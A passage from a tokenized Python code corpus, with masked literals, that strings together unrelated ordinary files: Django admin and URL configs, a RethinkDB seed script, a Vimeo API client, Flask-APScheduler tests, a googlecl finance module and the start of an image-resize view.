neighbors_idx , size = ( N , ) ) <EOL> chosen_neighbors = T [ nn_idx , : ] <EOL> diff = chosen_neighbors - T [ i , : ] <EOL> gap = np . random . uniform ( low = <NUM_LIT:0.0> , high = <NUM_LIT:1.0> , size = N ) [ : , np . newaxis ] <EOL> synthetic [ count : count + N , : ] = T [ i , : ] + ( gap * diff ) <EOL> count += N <EOL> return synthetic </s>
<s> from django . contrib import admin <EOL> from datatrans . models import KeyValue <EOL> class KeyValueAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:value>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> search_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' , ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> admin . site . register ( KeyValue , KeyValueAdmin ) </s>
<s> from django . conf . urls . defaults import * <EOL> from datatrans import urls <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> ( r'<STR_LIT>' , include ( urls ) ) , <EOL> ) </s>
<s> import codecs <EOL> import os <EOL> import rethinkdb as r <EOL> import db . init_db <EOL> import db . plugins <EOL> import db . util <EOL> import tags <EOL> def main ( ) : <EOL> conn = r . connect ( ) <EOL> try : <EOL> r . db_create ( '<STR_LIT>' ) . run ( conn ) <EOL> except r . RqlRuntimeError : <EOL> pass <EOL> conn . use ( '<STR_LIT>' ) <EOL> db . init_db . ensure_tables_and_indices ( ) <EOL> def read_file ( filename ) : <EOL> full_path = os . path . join ( os . path . dirname ( __file__ ) , filename ) <EOL> with codecs . open ( full_path , encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:r>' ) as f : <EOL> return f . read ( ) <EOL> ctrlp_readme = read_file ( '<STR_LIT>' ) <EOL> youcompleteme_readme = read_file ( '<STR_LIT>' ) <EOL> db . plugins . insert ( [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ctrlp_readme , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : youcompleteme_readme , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:C>' ] , <EOL> } , <EOL> ] , conflict = '<STR_LIT:replace>' ) <EOL> r . table ( '<STR_LIT>' ) . insert ( [ { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:count>' : <NUM_LIT:1> , <EOL> } ] ) <EOL> tags . aggregate_tags ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import ast <EOL> import _ast <EOL> import re <EOL> import os <EOL> testMatch = re . compile ( r'<STR_LIT>' % os . sep ) <EOL> def __get_line ( node ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( node , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> def __get_best_matching_child ( node , lineno ) : <EOL> """<STR_LIT>""" <EOL> childs = getattr ( node , '<STR_LIT:body>' , [ ] ) <EOL> result = next ( iter ( childs ) , None ) <EOL> result_lineno = __get_line ( result ) <EOL> for child in childs [ <NUM_LIT:1> : ] : <EOL> child_lineno = __get_line ( child ) <EOL> if child_lineno > lineno : <EOL> break <EOL> elif child_lineno == lineno : <EOL> return child <EOL> elif child_lineno > result_lineno : <EOL> result = child <EOL> result_lineno = child_lineno <EOL> return result <EOL> def __get_best_matching_chain ( node , lineno ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> while node and __get_line ( node ) <= lineno : <EOL> result . append ( node ) <EOL> node = __get_best_matching_child ( node , lineno ) <EOL> return result <EOL> def __is_test_case ( node ) : <EOL> """<STR_LIT>""" <EOL> if type ( node ) is _ast . ClassDef : <EOL> bases = [ base . attr for base in node . bases if hasattr ( base , '<STR_LIT>' ) ] <EOL> if '<STR_LIT>' in bases : <EOL> return True <EOL> if testMatch . match ( node . name ) : <EOL> return True <EOL> return False <EOL> def __is_test_function ( node ) : <EOL> """<STR_LIT>""" <EOL> if type ( node ) is _ast . FunctionDef and testMatch . match ( node . name ) : <EOL> return True <EOL> def get_ast_branch_at ( file_ , position ) : <EOL> """<STR_LIT>""" <EOL> module = ast . parse ( open ( file_ ) . read ( ) ) <EOL> return __get_best_matching_chain ( module , position [ <NUM_LIT:0> ] ) <EOL> def get_test_case_at ( file_ , position ) : <EOL> """<STR_LIT>""" <EOL> branch = get_ast_branch_at ( file_ , position ) <EOL> chain = branch [ <NUM_LIT:1> : ] <EOL> for node in reversed ( chain ) : <EOL> if __is_test_case ( node ) : <EOL> break <EOL> chain . pop ( ) <EOL> return "<STR_LIT:.>" . join ( [ node . name for node in chain ] ) <EOL> def get_test_function_at ( file_ , position ) : <EOL> """<STR_LIT>""" <EOL> branch = get_ast_branch_at ( file_ , position ) <EOL> chain = branch [ <NUM_LIT:1> : ] <EOL> for node in reversed ( chain ) : <EOL> if __is_test_function ( node ) : <EOL> break <EOL> if __is_test_case ( node ) : <EOL> break <EOL> chain . pop ( ) <EOL> return "<STR_LIT:.>" . join ( [ node . name for node in chain ] ) </s>
<s> import re <EOL> def match_tag_equality ( _oid , data , key , term ) : <EOL> return data [ '<STR_LIT>' ] . get ( key ) == term <EOL> def match_tag_exists ( _oid , data , key ) : <EOL> return key in data [ '<STR_LIT>' ] <EOL> def match_any_tag_value ( _oid , data , term ) : <EOL> return term in data [ '<STR_LIT>' ] . itervalues ( ) <EOL> def match_tag_regex ( _oid , data , key , term ) : <EOL> return key in data [ '<STR_LIT>' ] and re . search ( term , data [ '<STR_LIT>' ] [ key ] ) <EOL> def match_tag_name_regex ( _oid , data , key ) : <EOL> regex = re . compile ( key ) <EOL> return any ( regex . search ( k ) for k in data [ '<STR_LIT>' ] . iterkeys ( ) ) <EOL> def match_tag_value_regex ( _oid , data , term ) : <EOL> regex = re . compile ( term ) <EOL> return any ( regex . search ( v ) for v in data [ '<STR_LIT>' ] . itervalues ( ) ) <EOL> def match_id_regex ( oid , _data , key ) : <EOL> return re . search ( key , oid ) <EOL> def match_negate ( oid , data , ast ) : <EOL> return not match_ast ( oid , data , ast ) <EOL> def match_or ( oid , data , * asts ) : <EOL> return any ( match_ast ( oid , data , ast ) for ast in asts ) <EOL> def match_and ( oid , data , * asts ) : <EOL> return all ( match_ast ( oid , data , ast ) for ast in asts ) <EOL> def match_ast ( oid , data , ast ) : <EOL> return globals ( ) [ ast [ <NUM_LIT:0> ] ] ( oid , data , * ast [ <NUM_LIT:1> : ] ) <EOL> def filter_matching ( ast , objects ) : <EOL> return dict ( ( oid , data ) for ( oid , data ) in objects . items ( ) if match_ast ( oid , data , ast ) ) </s>
<s> class DummyPrefs : <EOL> graph_options = [ ] </s>
<s> from __future__ import absolute_import <EOL> from functools import wraps <EOL> import json <EOL> import requests <EOL> from . auth . client_credentials import ClientCredentialsMixin <EOL> from . auth . authorization_code import AuthorizationCodeMixin <EOL> from . upload import UploadMixin <EOL> class VimeoClient ( ClientCredentialsMixin , AuthorizationCodeMixin , UploadMixin ) : <EOL> """<STR_LIT>""" <EOL> API_ROOT = "<STR_LIT>" <EOL> HTTP_METHODS = { '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } <EOL> ACCEPT_HEADER = "<STR_LIT>" <EOL> USER_AGENT = "<STR_LIT>" <EOL> def __init__ ( self , token = None , key = None , secret = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . token = token <EOL> self . app_info = ( key , secret ) <EOL> self . _requests_methods = dict ( ) <EOL> assert token is not None or ( key is not None and secret is not None ) <EOL> @ property <EOL> def token ( self ) : <EOL> return self . _token . token <EOL> @ token . setter <EOL> def token ( self , value ) : <EOL> self . _token = _BearerToken ( value ) if value else None <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name not in self . HTTP_METHODS : <EOL> raise AttributeError ( "<STR_LIT>" % name ) <EOL> request_func = getattr ( requests , name , None ) <EOL> if request_func is None : <EOL> raise AttributeError ( "<STR_LIT>" <EOL> % name ) <EOL> @ wraps ( request_func ) <EOL> def caller ( url , jsonify = True , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> headers = kwargs . get ( '<STR_LIT>' , dict ( ) ) <EOL> headers [ '<STR_LIT>' ] = self . ACCEPT_HEADER <EOL> headers [ '<STR_LIT>' ] = self . USER_AGENT <EOL> if jsonify and '<STR_LIT:data>' in kwargs and isinstance ( kwargs [ '<STR_LIT:data>' ] , ( dict , list ) ) : <EOL> kwargs [ '<STR_LIT:data>' ] = json . dumps ( kwargs [ '<STR_LIT:data>' ] ) <EOL> headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT:application/json>' <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , ( <NUM_LIT:1> , <NUM_LIT:30> ) ) <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , self . _token ) <EOL> kwargs [ '<STR_LIT>' ] = headers <EOL> if not url [ : <NUM_LIT:4> ] == "<STR_LIT:http>" : <EOL> url = self . API_ROOT + url <EOL> return request_func ( <EOL> url , <EOL> ** kwargs ) <EOL> return caller <EOL> class _BearerToken ( requests . auth . AuthBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , token ) : <EOL> self . token = token <EOL> def __call__ ( self , request ) : <EOL> request . headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . token <EOL> return request </s>
<s> import json <EOL> from flask import Flask <EOL> from flask_apscheduler import APScheduler <EOL> from unittest import TestCase <EOL> class TestViews ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . app = Flask ( __name__ ) <EOL> self . app . config [ '<STR_LIT>' ] = True <EOL> self . scheduler = APScheduler ( app = self . app ) <EOL> self . scheduler . start ( ) <EOL> self . client = self . app . test_client ( ) <EOL> def test_scheduler_info ( self ) : <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> info = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertIsNotNone ( info [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT>' ] , [ '<STR_LIT:*>' ] ) <EOL> self . assertTrue ( info [ '<STR_LIT>' ] ) <EOL> def test_add_job ( self ) : <EOL> job = { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> response = self . client . post ( '<STR_LIT>' , data = json . dumps ( job ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> job2 = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT:id>' ) , job2 . get ( '<STR_LIT:id>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> def test_add_conflicted_job ( self ) : <EOL> job = { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> response = self . client . post ( '<STR_LIT>' , data = json . dumps ( job ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> response = self . client . post ( '<STR_LIT>' , data = json . dumps ( job ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_add_invalid_job ( self ) : <EOL> job = { <EOL> '<STR_LIT:id>' : None , <EOL> } <EOL> response = self . client . post ( '<STR_LIT>' , data = json . dumps ( job ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_delete_job ( self ) : <EOL> self . __add_job ( ) <EOL> response = self . client . delete ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_delete_job_not_found ( self ) : <EOL> response = self . client . delete ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_get_job ( self ) : <EOL> job = self . __add_job ( ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> job2 = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT:id>' ) , job2 . get ( '<STR_LIT:id>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> def test_get_job_not_found ( self ) : <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_get_all_jobs ( self ) : <EOL> job = self . __add_job ( ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> jobs = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertEqual ( len ( jobs ) , <NUM_LIT:1> ) <EOL> job2 = jobs [ <NUM_LIT:0> ] <EOL> self . assertEqual ( job . get ( '<STR_LIT:id>' ) , job2 . get ( '<STR_LIT:id>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> def test_update_job ( self ) : <EOL> job = self . __add_job ( ) <EOL> data_to_update = { <EOL> '<STR_LIT:args>' : [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = self . client . patch ( '<STR_LIT>' , data = json . dumps ( data_to_update ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> job2 = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT:id>' ) , job2 . get ( '<STR_LIT:id>' ) ) <EOL> self . assertEqual ( job . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( data_to_update . get ( '<STR_LIT:args>' ) , job2 . get ( '<STR_LIT:args>' ) ) <EOL> self . assertEqual ( data_to_update . get ( '<STR_LIT>' ) , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , job2 . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , job2 . get ( '<STR_LIT>' ) ) <EOL> def test_update_job_not_found ( self ) : <EOL> data_to_update = { <EOL> '<STR_LIT:args>' : [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = self . client . patch ( '<STR_LIT>' , data = json . dumps ( data_to_update ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_update_invalid_job ( self ) : <EOL> self . __add_job ( ) <EOL> data_to_update = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> response = self . client . patch ( '<STR_LIT>' , data = json . dumps ( data_to_update ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_pause_and_resume_job ( self ) : <EOL> self . __add_job ( ) <EOL> response = self . client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> job = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertIsNone ( job . get ( '<STR_LIT>' ) ) <EOL> response = self . client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> job = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertIsNotNone ( job . get ( '<STR_LIT>' ) ) <EOL> def test_pause_and_resume_job_not_found ( self ) : <EOL> response = self . client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_run_job ( self ) : <EOL> self . __add_job ( ) <EOL> response = self . client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> job = json . loads ( response . get_data ( as_text = True ) ) <EOL> self . assertIsNotNone ( job . get ( '<STR_LIT>' ) ) <EOL> def test_run_job_not_found ( self ) : <EOL> response = self . client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def __add_job ( self ) : <EOL> job = { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> } <EOL> response = self . client . post ( '<STR_LIT>' , data = json . dumps ( job ) ) <EOL> return json . loads ( response . get_data ( as_text = True ) ) <EOL> def job1 ( x = <NUM_LIT:0> ) : <EOL> print ( x ) </s>
<s> import googlecl <EOL> import inspect <EOL> import logging <EOL> import os <EOL> import sys <EOL> from googlecl . base import Task <EOL> safe_encode = googlecl . safe_encode <EOL> service_name = __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> LOGGER_NAME = __name__ <EOL> SECTION_HEADER = service_name . upper ( ) <EOL> LOG = logging . getLogger ( LOGGER_NAME ) <EOL> class BaseFormatter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , avail_fields , fields , sep = '<STR_LIT:U+002C>' ) : <EOL> """<STR_LIT>""" <EOL> if fields : <EOL> self . fields = fields . split ( sep ) <EOL> else : <EOL> self . fields = [ item [ <NUM_LIT:0> ] for item in avail_fields ] <EOL> self . avail_fields = avail_fields <EOL> avail_dict = dict ( avail_fields ) <EOL> self . format = '<STR_LIT:U+0020>' . join ( avail_dict [ name ] for name in self . fields ) <EOL> @ property <EOL> def header ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . format % dict ( [ ( item [ <NUM_LIT:0> ] , item [ <NUM_LIT:0> ] . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) . capitalize ( ) ) <EOL> for item in self . avail_fields ] ) <EOL> def get_line ( self , entry ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> ( self . __class__ . __name__ , <EOL> inspect . stack ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:3> ] ) ) <EOL> def output ( self , entries , stream = sys . stdout ) : <EOL> """<STR_LIT>""" <EOL> if self . header : <EOL> stream . write ( self . header + os . linesep ) <EOL> for entry in entries : <EOL> stream . write ( self . get_line ( entry ) + os . linesep ) <EOL> class PortfolioFormatter ( BaseFormatter ) : <EOL> avail_fields = [ ( '<STR_LIT:id>' , '<STR_LIT>' ) , ( '<STR_LIT:title>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def __init__ ( self , fields ) : <EOL> super ( self . __class__ , self ) . __init__ ( self . avail_fields , fields ) <EOL> def get_line ( self , entry ) : <EOL> data = entry . portfolio_data <EOL> return self . format % { '<STR_LIT:id>' : entry . portfolio_id , '<STR_LIT:title>' : entry . portfolio_title , <EOL> '<STR_LIT>' : data . currency_code , <EOL> '<STR_LIT>' : data . gain and data . gain . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( float ( data . gain_percentage ) * <NUM_LIT:100> , ) , <EOL> '<STR_LIT>' : data . cost_basis and data . cost_basis . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : data . days_gain and data . days_gain . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : data . market_value and data . market_value . money [ <NUM_LIT:0> ] . amount <EOL> } <EOL> class PositionFormatter ( BaseFormatter ) : <EOL> avail_fields = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def __init__ ( self , fields ) : <EOL> super ( self . __class__ , self ) . __init__ ( self . avail_fields , fields ) <EOL> def get_line ( self , entry ) : <EOL> data = entry . position_data <EOL> return self . format % { '<STR_LIT>' : entry . ticker_id , '<STR_LIT>' : data . shares , <EOL> '<STR_LIT>' : data . gain and data . gain . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( float ( data . gain_percentage ) * <NUM_LIT:100> , ) , <EOL> '<STR_LIT>' : data . cost_basis and data . cost_basis . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : data . days_gain and data . days_gain . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : data . market_value and data . market_value . money [ <NUM_LIT:0> ] . amount <EOL> } <EOL> class TransactionFormatter ( BaseFormatter ) : <EOL> avail_fields = [ ( '<STR_LIT:id>' , '<STR_LIT>' ) , ( '<STR_LIT:type>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:date>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def __init__ ( self , fields ) : <EOL> super ( self . __class__ , self ) . __init__ ( self . avail_fields , fields ) <EOL> def get_line ( self , entry ) : <EOL> data = entry . transaction_data <EOL> if data . date : <EOL> data . date = data . date [ : <NUM_LIT:10> ] <EOL> return self . format % { '<STR_LIT:id>' : entry . transaction_id , '<STR_LIT:type>' : data . type , '<STR_LIT>' : data . shares , <EOL> '<STR_LIT>' : data . price . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT>' : data . commission . money [ <NUM_LIT:0> ] . amount , <EOL> '<STR_LIT:date>' : data . date or '<STR_LIT>' , '<STR_LIT>' : data . notes or '<STR_LIT>' } <EOL> def _run_create ( client , options , args ) : <EOL> client . CreatePortfolio ( options . title , options . currency ) <EOL> def _run_delete ( client , options , args ) : <EOL> entries = client . get_portfolio_entries ( options . title , positions = True ) <EOL> if entries : <EOL> client . DeleteEntryList ( entries , '<STR_LIT>' , options . prompt ) <EOL> def _run_list ( client , options , args ) : <EOL> entries = client . get_portfolio_entries ( returns = True ) <EOL> if entries : <EOL> PortfolioFormatter ( options . fields ) . output ( entries ) <EOL> else : <EOL> LOG . info ( '<STR_LIT>' ) <EOL> def _run_create_position ( client , options , args ) : <EOL> pfl = client . get_portfolio ( options . title , positions = True ) <EOL> if pfl : <EOL> client . create_transaction ( pfl , "<STR_LIT>" , options . ticker ) <EOL> def _run_delete_positions ( client , options , args ) : <EOL> positions = client . get_positions ( portfolio_title = options . title , <EOL> ticker_id = options . ticker ) <EOL> client . DeleteEntryList ( positions , '<STR_LIT>' , options . prompt , <EOL> callback = lambda pos : client . DeletePosition ( position_entry = pos ) ) <EOL> def _run_list_positions ( client , options , args ) : <EOL> positions = client . get_positions ( options . title , options . ticker , <EOL> include_returns = True ) <EOL> if positions : <EOL> PositionFormatter ( options . fields ) . output ( positions ) <EOL> else : <EOL> LOG . info ( '<STR_LIT>' ) <EOL> def _run_create_transaction ( client , options , args ) : <EOL> pfl = client . get_portfolio ( options . title ) <EOL> if pfl : <EOL> client . create_transaction ( pfl , options . ttype , options . ticker , <EOL> options . shares , options . price , <EOL> options . currency , options . commission , <EOL> options . date , options . notes ) <EOL> def _run_delete_transactions ( client , options , args ) : <EOL> transactions = client . get_transactions ( portfolio_title = options . title , <EOL> ticker_id = options . ticker , <EOL> transaction_id = options . txnid ) <EOL> client . DeleteEntryList ( transactions , '<STR_LIT>' , options . prompt ) <EOL> def _run_list_transactions ( client , options , args ) : <EOL> transactions = client . get_transactions ( portfolio_title = options . title , <EOL> ticker_id = options . ticker , <EOL> transaction_id = options . txnid ) <EOL> TransactionFormatter ( options . fields ) . output ( transactions ) <EOL> TASKS = { '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_create , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_delete , <EOL> required = [ '<STR_LIT:title>' ] ) , <EOL> '<STR_LIT:list>' : Task ( '<STR_LIT>' , <EOL> callback = _run_list , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_create_position , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_delete_positions , <EOL> required = [ '<STR_LIT:title>' ] , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_list_positions , <EOL> required = [ '<STR_LIT:title>' ] , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_create_transaction , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> optional = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_list_transactions , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : Task ( '<STR_LIT>' , <EOL> callback = _run_delete_transactions , <EOL> required = [ '<STR_LIT:title>' , '<STR_LIT>' ] , <EOL> optional = [ '<STR_LIT>' ] ) , <EOL> } </s>
<s> __version__ = '<STR_LIT:1.0>' <EOL> import django <EOL> from distutils . version import StrictVersion <EOL> dj_version = django . get_version ( ) <EOL> if StrictVersion ( dj_version ) < StrictVersion ( '<STR_LIT>' ) : <EOL> from rolepermissions . loader import load_roles_and_permissions <EOL> load_roles_and_permissions ( ) <EOL> else : <EOL> default_app_config = '<STR_LIT>' </s>
<s> from django . http import HttpResponse <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . core . cache import get_cache <EOL> from django . utils . http import http_date <EOL> from imagefit . conf import settings <EOL> from imagefit . models import Image , Presets <EOL> import os <EOL> cache = get_cache ( settings . IMAGEFIT_CACHE_BACKEND_NAME ) <EOL> def _image_response ( image ) : <EOL> response = HttpResponse ( <EOL> image . render ( ) , <EOL> image . mimetype <EOL> ) <EOL> response [ '<STR_LIT>' ] = http_date ( image . modified ) <EOL> return response <EOL> def resize ( request , path_name , format , url ) : <EOL> if path_name == '<STR_LIT>' : <EOL> prefix = settings . STATIC_ROOT <EOL> elif path_name == '<STR_LIT>' : <EOL> prefix = settings . MEDIA_ROOT <EOL> else : <EOL> prefix = settings . IMAGEFIT_ROOT <EOL> if url [ <NUM_LIT:0> ] == '<STR_LIT:/>' : <EOL> url = url [ <NUM_LIT:1> : ] <EOL> image = Image ( path = os . path . join ( prefix , url ) ) <EOL> if settings . 